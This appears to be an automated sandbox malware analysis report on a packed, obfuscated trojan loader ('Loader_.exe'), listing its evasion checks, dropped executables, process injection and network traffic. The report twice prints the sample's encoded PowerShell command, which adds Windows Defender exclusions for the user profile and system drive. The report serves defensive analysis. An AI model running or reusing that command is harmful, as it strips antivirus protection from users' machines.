Malware Analysis Report

2025-05-28 16:27

Sample ID 230715-2hkvjacg9z
Target Loader_.exe
SHA256 b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec
Tags themida agilenet evasion trojan
Score 9/10

Analysis Overview

score
9/10

SHA256

b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec

Threat Level: Likely malicious

The file Loader_.exe was found to be: Likely malicious.

Malicious Activity Summary

themida agilenet evasion trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Checks computer location settings

Themida packer

Checks BIOS information in registry

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Loads dropped DLL

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Analysis: static1

Detonation Overview

Reported

2023-07-15 22:35

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-15 22:34

Reported

2023-07-15 22:36

Platform

win7-20230712-en

Max time kernel

32s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
N/A N/A C:\Users\Admin\compiled.exe N/A
N/A N/A C:\Users\Admin\compiled.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Loader_.exe

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="

C:\Users\Admin\compiled.exe

"C:\Users\Admin\compiled.exe"

C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe

"C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe" -unpacking

C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

"C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe"

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-15 22:34

Reported

2023-07-15 22:36

Platform

win10v2004-20230703-en

Max time kernel

40s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Loader_.exe

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="

C:\Users\Admin\compiled.exe

"C:\Users\Admin\compiled.exe"

C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe

"C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 254.143.241.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
NL 2.19.195.219:443 assets.msn.com tcp
US 8.8.8.8:53 219.195.19.2.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp

Files
